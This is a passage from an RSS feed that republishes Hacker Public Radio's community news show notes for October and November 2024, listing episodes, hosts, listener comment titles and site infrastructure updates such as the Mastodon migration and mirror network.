(2024-10-23) "<em>OggCamp 2024 Day 1</em>"
by <a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4233/index.html#comment_4113" target="_blank">Comment 1</a>:
@geospart on 2024-11-09:
"Nice"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4236/index.html#comments" target="_blank">hpr4236</a></strong>
(2024-10-28) "<em>History of Nintendo</em>"
by <a href="https://hackerpublicradio.org/correspondents/0434.html" target="_blank">Lochyboy</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4236/index.html#comment_4116" target="_blank">Comment 3</a>:
SolusSpider - Peter Paterson on 2024-11-10:
"Comment on History of Nintendo"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4236/index.html#comment_4133" target="_blank">Comment 4</a>:
John Curwood - blindape on 2024-11-20:
"Virtual Boy"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4238/index.html#comments" target="_blank">hpr4238</a></strong>
(2024-10-30) "<em>Snaps are better than flatpaks</em>"
by <a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4238/index.html#comment_4099" target="_blank">Comment 2</a>:
Elliot B on 2024-11-01:
"Snaps are the least worst"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4238/index.html#comment_4100" target="_blank">Comment 3</a>:
mpardo on 2024-11-02:
"Snaps are indeed better that Flatpaks"</li></ul><br>
</li></ul>
<h3>This month's shows</h3>
<p>There are 40 comments on 16 of this month's shows:</p>
<ul><li><strong><a href="https://hackerpublicradio.org/eps/hpr4240/index.html#comments" target="_blank">hpr4240</a></strong>
(2024-11-01) "<em>The First Doctor, Part 1</em>"
by <a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4240/index.html#comment_4095" target="_blank">Comment 1</a>:
Kevie on 2024-10-31:
"Keep them coming"</li><li><a href="https://hackerpublicradio.org/eps/hpr4240/index.html#comment_4101" target="_blank">Comment 2</a>:
Kevin O'Brien on 2024-11-02:
"More to come"</li><li><a href="https://hackerpublicradio.org/eps/hpr4240/index.html#comment_4105" target="_blank">Comment 3</a>:
Ken Fallon on 2024-11-07:
"Daleks"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comments" target="_blank">hpr4241</a></strong>
(2024-11-04) "<em>HPR Community News for October 2024</em>"
by <a href="https://hackerpublicradio.org/correspondents/0159.html" target="_blank">HPR Volunteers</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comment_4102" target="_blank">Comment 1</a>:
ClaudioM on 2024-11-04:
"Commentary on Ep. 4231 (Tmux+dd+FreeBSD)"</li><li><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comment_4115" target="_blank">Comment 2</a>:
Torin Doyle on 2024-11-10:
"Hunting, Buzzing"</li><li><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comment_4121" target="_blank">Comment 3</a>:
Dave Morriss on 2024-11-14:
"Buzzing?"</li><li><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comment_4123" target="_blank">Comment 4</a>:
Dave Lee (thelovebug) on 2024-11-16:
"Dave's buzzing"</li><li><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comment_4124" target="_blank">Comment 5</a>:
Torin Doyle on 2024-11-18:
"Re: Buzzing (more like a hum) in the audio for Dave Morriss."</li><li><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comment_4128" target="_blank">Comment 6</a>:
Dave Morriss on 2024-11-18:
"The buzzing of the brain"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comments" target="_blank">hpr4244</a></strong>
(2024-11-07) "<em>Two methods of digitizing photos.</em>"
by <a href="https://hackerpublicradio.org/correspondents/0429.html" target="_blank">Henrik Hemrin</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comment_4104" target="_blank">Comment 1</a>:
Henrik Hemrin on 2024-11-07:
"Clarification equipment for repro photo"</li><li><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comment_4106" target="_blank">Comment 2</a>:
Ken Fallon on 2024-11-07:
"What hardware are you using"</li><li><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comment_4109" target="_blank">Comment 3</a>:
Henrik Hemrin on 2024-11-07:
"Response to Ken"</li><li><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comment_4110" target="_blank">Comment 4</a>:
Charles in NJ on 2024-11-08:
"Missed this show because feed is broken"</li><li><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comment_4111" target="_blank">Comment 5</a>:
Ken Fallon on 2024-11-08:
"Bug Report"</li><li><a href="https://hackerpublicradio.org/eps/hpr4244/index.html#comment_4114" target="_blank">Comment 6</a>:
Ken Fallon on 2024-11-09:
"Please send me your version of bashpodder"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4245/index.html#comments" target="_blank">hpr4245</a></strong>
(2024-11-08) "<em>What's in my bag?</em>"
by <a href="https://hackerpublicradio.org/correspondents/0394.html" target="_blank">Trey</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4245/index.html#comment_4103" target="_blank">Comment 1</a>:
men Fallon on 2024-11-07:
"Backdoors and breaches"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4246/index.html#comments" target="_blank">hpr4246</a></strong>
(2024-11-11) "<em>Bytes, Pages and Screens</em>"
by <a href="https://hackerpublicradio.org/correspondents/0403.html" target="_blank">Lee</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4246/index.html#comment_4107" target="_blank">Comment 1</a>:
Ken Fallon on 2024-11-07:
"Terry Pratchett"</li><li><a href="https://hackerpublicradio.org/eps/hpr4246/index.html#comment_4127" target="_blank">Comment 2</a>:
Torin Doyle on 2024-11-18:
"Podcasts, Books, TV"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4248/index.html#comments" target="_blank">hpr4248</a></strong>
(2024-11-13) "<em>Millie Perkins</em>"
by <a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4248/index.html#comment_4119" target="_blank">Comment 1</a>:
Kevie on 2024-11-13:
"A fantastic Oggcamp Talk"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4249/index.html#comments" target="_blank">hpr4249</a></strong>
(2024-11-14) "<em>Audio Streams on the Command Line</em>"
by <a href="https://hackerpublicradio.org/correspondents/0296.html" target="_blank">Kevie</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4249/index.html#comment_4108" target="_blank">Comment 1</a>:
Ken Fallon on 2024-11-07:
"Great Tips"</li><li><a href="https://hackerpublicradio.org/eps/hpr4249/index.html#comment_4120" target="_blank">Comment 2</a>:
SolusSpider - Peter Paterson on 2024-11-14:
"Comment on Audio Streams on the Command Line"</li><li><a href="https://hackerpublicradio.org/eps/hpr4249/index.html#comment_4122" target="_blank">Comment 3</a>:
Jan on 2024-11-14:
"Just Thanks"</li><li><a href="https://hackerpublicradio.org/eps/hpr4249/index.html#comment_4157" target="_blank">Comment 4</a>:
Henrik Hemrin on 2024-11-29:
"Command Line"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4251/index.html#comments" target="_blank">hpr4251</a></strong>
(2024-11-18) "<em>Dave and MrX turn over a new leaf</em>"
by <a href="https://hackerpublicradio.org/correspondents/0225.html" target="_blank">Dave Morriss</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4251/index.html#comment_4135" target="_blank">Comment 1</a>:
FXB on 2024-11-23:
"using wttr.in"</li><li><a href="https://hackerpublicradio.org/eps/hpr4251/index.html#comment_4136" target="_blank">Comment 2</a>:
Dave Morriss on 2024-11-23:
"Re: wttr.in"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4252/index.html#comments" target="_blank">hpr4252</a></strong>
(2024-11-19) "<em>Privacy is not hiding</em>"
by <a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4252/index.html#comment_4132" target="_blank">Comment 1</a>:
Tim J on 2024-11-20:
"Big Tech is Watching You"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4253/index.html#comments" target="_blank">hpr4253</a></strong>
(2024-11-20) "<em>A brief introduction of myself</em>"
by <a href="https://hackerpublicradio.org/correspondents/0414.html" target="_blank">Kinghezy</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4253/index.html#comment_4131" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-20:
"Comment on kinghezy's introduction show hpr4253"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4256/index.html#comments" target="_blank">hpr4256</a></strong>
(2024-11-25) "<em>Birds of a Feather Talk at OLF 2024</em>"
by <a href="https://hackerpublicradio.org/correspondents/0270.html" target="_blank">Thaj Sara</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4256/index.html#comment_4134" target="_blank">Comment 1</a>:
Ken Fallon on 2024-11-21:
"Suspense"</li><li><a href="https://hackerpublicradio.org/eps/hpr4256/index.html#comment_4138" target="_blank">Comment 2</a>:
Thaj on 2024-11-25:
"Resolution"</li><li><a href="https://hackerpublicradio.org/eps/hpr4256/index.html#comment_4142" target="_blank">Comment 3</a>:
Windigo on 2024-11-26:
"Future shows"</li><li><a href="https://hackerpublicradio.org/eps/hpr4256/index.html#comment_4158" target="_blank">Comment 4</a>:
Torin Doyle on 2024-11-30:
"OLF?"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4257/index.html#comments" target="_blank">hpr4257</a></strong>
(2024-11-26) "<em>Movie review: The Artifice Girl</em>"
by <a href="https://hackerpublicradio.org/correspondents/0296.html" target="_blank">Kevie</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4257/index.html#comment_4141" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-26:
"Also watched The Atifice Girl"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4258/index.html#comments" target="_blank">hpr4258</a></strong>
(2024-11-27) "<em>Introduction and History of Using Computers</em>"
by <a href="https://hackerpublicradio.org/correspondents/0437.html" target="_blank">SolusSpider</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4258/index.html#comment_4125" target="_blank">Comment 1</a>:
Dave Lee (thelovebug) on 2024-11-18:
"Welcome to the HPR family"</li><li><a href="https://hackerpublicradio.org/eps/hpr4258/index.html#comment_4130" target="_blank">Comment 2</a>:
present_arms on 2024-11-19:
"This Podcast hpr4258 :: Introduction and History of Using Computers"</li><li><a href="https://hackerpublicradio.org/eps/hpr4258/index.html#comment_4144" target="_blank">Comment 3</a>:
archer72 on 2024-11-27:
"Welcome to HPR"</li><li><a href="https://hackerpublicradio.org/eps/hpr4258/index.html#comment_4156" target="_blank">Comment 4</a>:
Henrik Hemrin on 2024-11-29:
"Welcome as HPR host!"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4259/index.html#comments" target="_blank">hpr4259</a></strong>
(2024-11-28) "<em>Why digitize photos</em>"
by <a href="https://hackerpublicradio.org/correspondents/0429.html" target="_blank">Henrik Hemrin</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4259/index.html#comment_4147" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-28:
"The thoughts behind digitizing photos"</li><li><a href="https://hackerpublicradio.org/eps/hpr4259/index.html#comment_4155" target="_blank">Comment 2</a>:
Henrik Hemrin on 2024-11-29:
"Thanks for your comment"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4272/index.html#comments" target="_blank">hpr4272</a></strong>
(2024-12-17) "<em>Embed Mastodon Threads</em>"
by <a href="https://hackerpublicradio.org/correspondents/0436.html" target="_blank">hairylarry</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4272/index.html#comment_4148" target="_blank">Comment 1</a>:
Ken Fallon on 2024-11-28:
"Wayne Myers ?? Where did I hear that name before ?"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4320/index.html#comments" target="_blank">hpr4320</a></strong>
(2025-02-21) "<em>Switching my Mastodon account</em>"
by <a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4320/index.html#comment_4137" target="_blank">Comment 1</a>:
Ken Fallon on 2024-11-25:
"Target Audience of 1"</li></ul><br>
</li></ul>

<h2>Mailing List discussions</h2>
<p>
Policy decisions surrounding HPR are taken by the community as a whole. This
discussion takes place on the <a href="https://hackerpublicradio.org/maillist" target="_blank">Mail List</a> which is open to all HPR listeners and
contributors. The discussions are open and available on the HPR server under
<a href="https://lists.hackerpublicradio.com/pipermail/hpr">Mailman</a>.
</p>
<p>The threaded discussions this month can be found here:</p>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2024-November/thread.html" target="_blank">https://lists.hackerpublicradio.com/pipermail/hpr/2024-November/thread.html</a>


<h2>Events Calendar</h2>
<p>With the kind permission of <strong>LWN.net</strong> we are linking to
<a href="https://lwn.net/Calendar/" target="_blank">The LWN.net Community Calendar</a>.</p>
<p>Quoting the site:</p>
<blockquote>This is the LWN.net community event calendar, where we track
events of interest to people using and developing Linux and free software.
Clicking on individual events will take you to the appropriate web
page.</blockquote>

<h2>Any other business</h2>
<p>It's been another hectic month here at HPR Towers.</p>
<p>As we discussed on the mailing list most of the time was taken by the
migration to Mastodon, and the implementation of the mirrors on the
Community Content Delivery Network. Some daily stats are been updated on
<a href="https://hub.hackerpublicradio.org/hpr_ccdn_stats.tsv" class="uri">https://hub.hackerpublicradio.org/hpr_ccdn_stats.tsv</a></p>
<p>Summary of the changes to the repo <a href="https://repo.anhonesthost.net/HPR" class="uri">https://repo.anhonesthost.net/HPR</a></p>
<p>Dave updated his tooling for processing shows and they are now
available on the Gitea repo.</p>
<p>We finally got around to creating the HPR Documentation wiki.</p>
<ul>
<li>Community Content Delivery Network (CCDN) A location to track the
deployment of the HPR Community Content Delivery Network, that provides
a mirror network for our content.</li>
<li>HPR Website Design This is literally in the whiteboard phase of the
HPR website redesign. Where we can track Compatibility of the clients
subscribed to our feeds.</li>
<li>Useful Resources Where we can link to other free culture sites that
provide useful services.</li>
<li>Requested Topics Where we can track topics that have been requested,
and link to shows that addressed them.</li>
</ul>
<p>There is also a list with information about Podcatcher and Podcasting
Platform Compatibility. If anyone wants to adopt a player then please do
so.</p>
<p>The section on Workflow will be changing shortly due to Dave stepping
aside, and also the need to distribute to multiple end points. All the
processing will happen first, and then all the checks will be done at
the same stage just prior to posting. For this to work we need help
finding a simple manageable WYSIWYG editor that can produce sane HTML
when the host uploads the show. We also need a new system to distribute
the files from an origin to all the mirrors.</p>
<p>Other changes and fixes.</p>
<ul>
<li>The day of the week is now available on the website.</li>
<li>Fixed the RSS feed to show explicit status.</li>
<li>Fixed a bug that limited the future feed to just 10 shows.</li>
<li>Fixed a typo in the status page.</li>
<li>Following feedback, added emphasis about the upcoming two weeks, to
the scheduling guidelines.</li>
<li>Notable shout out to the people who are promoting HPR and are
helping people out with audio issues.</li>
</ul>


<p><a href="https://hackerpublicradio.org/eps/hpr4261/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4241: HPR Community News for October 2024]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.


New hosts

There were no new hosts this month.


Last Month's Shows


Id
Day
Date
Title
Host


4217
Tue
2024-10-01
Episode 2 - Dirt Simple Photo Gallery
hairylarry


4218
Wed
2024-10-02
Crazy Battery Story
Swift110


4219
Thu
2024-10-03
Black ...]]></description>
<link>https://tsecurity.de/de/2422458/podcasts/hpr4241-hpr-community-news-for-october-2024/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2422458/podcasts/hpr4241-hpr-community-news-for-october-2024/</guid>
<pubDate>Mon, 04 Nov 2024 01:04:45 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>


<h2>New hosts</h2>
<p>
There were no new hosts this month.
</p>

<h2>Last Month's Shows</h2>
<table>
<tr>
<th>Id</th>
<th>Day</th>
<th>Date</th>
<th>Title</th>
<th>Host</th>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4217/index.html" target="_blank">4217</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-10-01</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4217/index.html" target="_blank">Episode 2 - Dirt Simple Photo Gallery</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0436.html" target="_blank">hairylarry</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4218/index.html" target="_blank">4218</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-10-02</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4218/index.html" target="_blank">Crazy Battery Story</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0297.html" target="_blank">Swift110</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4219/index.html" target="_blank">4219</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-10-03</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4219/index.html" target="_blank">Black diamond head lamp and other gear</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4220/index.html" target="_blank">4220</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-10-04</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4220/index.html" target="_blank">How Doctor Who Began</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4221/index.html" target="_blank">4221</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-10-07</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4221/index.html" target="_blank">HPR Community News for September 2024</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0159.html" target="_blank">HPR Volunteers</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4222/index.html" target="_blank">4222</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-10-08</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4222/index.html" target="_blank">Replacing backup batteries in my Kenwood TS940S HF Radio Part 5</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0201.html" target="_blank">MrX</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4223/index.html" target="_blank">4223</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-10-09</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4223/index.html" target="_blank">Movie review of The Artifice Girl</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4224/index.html" target="_blank">4224</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-10-10</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4224/index.html" target="_blank">Auto shop interaction</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0318.html" target="_blank">Archer72</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4225/index.html" target="_blank">4225</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-10-11</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4225/index.html" target="_blank">Chewing the rag with Kristoff and Ken</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4226/index.html" target="_blank">4226</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-10-14</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4226/index.html" target="_blank">JAMBOREE and Taco Bell!</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0036.html" target="_blank">operat0r</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4227/index.html" target="_blank">4227</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-10-15</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4227/index.html" target="_blank">Introduction to jq - part 3</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0225.html" target="_blank">Dave Morriss</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4228/index.html" target="_blank">4228</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-10-16</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4228/index.html" target="_blank">Auditing Audio Files For Youtube</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0430.html" target="_blank">Dave Hingley</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4229/index.html" target="_blank">4229</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-10-17</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4229/index.html" target="_blank">Neurodiversity and Hacking</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0403.html" target="_blank">Lee</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4230/index.html" target="_blank">4230</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-10-18</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4230/index.html" target="_blank">Playing Civilization IV, Part 2</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4231/index.html" target="_blank">4231</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-10-21</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4231/index.html" target="_blank">Duplicating Multiple USB Flash Drives with DD and Tmux on FreeBSD</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0152.html" target="_blank">Claudio Miranda</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4232/index.html" target="_blank">4232</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-10-22</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4232/index.html" target="_blank">Replacing backup batteries in my Kenwood TS940S HF Radio Part 6</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0201.html" target="_blank">MrX</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4233/index.html" target="_blank">4233</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-10-23</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4233/index.html" target="_blank">OggCamp 2024 Day 1</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4234/index.html" target="_blank">4234</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-10-24</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4234/index.html" target="_blank">OggCamp 2024 Day 2</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4235/index.html" target="_blank">4235</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-10-25</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4235/index.html" target="_blank">What Is Plain Text Programming?</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0436.html" target="_blank">hairylarry</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4236/index.html" target="_blank">4236</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-10-28</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4236/index.html" target="_blank">History of Nintendo</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0434.html" target="_blank">Lochyboy</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4237/index.html" target="_blank">4237</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-10-29</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4237/index.html" target="_blank">My First OggCamp Experience</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0296.html" target="_blank">Kevie</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4238/index.html" target="_blank">4238</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-10-30</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4238/index.html" target="_blank">Snaps are better than flatpaks</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4239/index.html" target="_blank">4239</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-10-31</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4239/index.html" target="_blank">Android Tasker and Automation</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0036.html" target="_blank">operat0r</a></td>
</tr>
</table>

<h2>Comments this month</h2>

<p>These are comments which have been made during the past month, either to shows released during the month or to past shows.
There are 25 comments in total.</p>
<h3>Past shows</h3>
<p>There are 8 comments on
4 previous shows:</p>
<ul>
<li><strong><a href="https://hackerpublicradio.org/eps/hpr4208/index.html#comments" target="_blank">hpr4208</a></strong>
(2024-09-18) "<em>01 Plain Text Programs</em>"
by <a href="https://hackerpublicradio.org/correspondents/0436.html" target="_blank">hairylarry</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4208/index.html#comment_4076" target="_blank">Comment 3</a>:
Beeza on 2024-10-03:
"Plaintext Programs"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4208/index.html#comment_4077" target="_blank">Comment 4</a>:
Dave Morriss on 2024-10-04:
"Regarding VMS and indexed files"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4208/index.html#comment_4080" target="_blank">Comment 5</a>:
hairylarry on 2024-10-07:
"Thanks for the comments"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4211/index.html#comments" target="_blank">hpr4211</a></strong>
(2024-09-23) "<em>Rapid Fire 1</em>"
by <a href="https://hackerpublicradio.org/correspondents/0036.html" target="_blank">operat0r</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4211/index.html#comment_4088" target="_blank">Comment 1</a>:
Sun Yat Babo on 2024-10-25:
"neuro diverse film"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4213/index.html#comments" target="_blank">hpr4213</a></strong>
(2024-09-25) "<em>Making Waves Day 1</em>"
by <a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4213/index.html#comment_4083" target="_blank">Comment 1</a>:
dmt on 2024-10-12:
"satdump"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4216/index.html#comments" target="_blank">hpr4216</a></strong>
(2024-09-30) "<em>Down the rabbit hole.</em>"
by <a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4216/index.html#comment_4075" target="_blank">Comment 1</a>:
Beeza on 2024-10-03:
"Good Samaritans"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4216/index.html#comment_4086" target="_blank">Comment 2</a>:
Reto on 2024-10-23:
"The humor"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4216/index.html#comment_4087" target="_blank">Comment 3</a>:
Ken Fallon on 2024-10-24:
"The View from NL"</li></ul><br>
</li></ul>
<h3>This month's shows</h3>
<p>There are 17 comments on 10 of this month's shows:</p>
<ul><li><strong><a href="https://hackerpublicradio.org/eps/hpr4221/index.html#comments" target="_blank">hpr4221</a></strong>
(2024-10-07) "<em>HPR Community News for September 2024</em>"
by <a href="https://hackerpublicradio.org/correspondents/0159.html" target="_blank">HPR Volunteers</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4221/index.html#comment_4078" target="_blank">Comment 1</a>:
Dave Morriss on 2024-10-05:
"Show notes for the HPR New Years Eve Show 2023-24"</li><li><a href="https://hackerpublicradio.org/eps/hpr4221/index.html#comment_4079" target="_blank">Comment 2</a>:
brian-in-ohio on 2024-10-07:
"best price?"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4222/index.html#comments" target="_blank">hpr4222</a></strong>
(2024-10-08) "<em>Replacing backup batteries in my Kenwood TS940S HF Radio Part 5</em>"
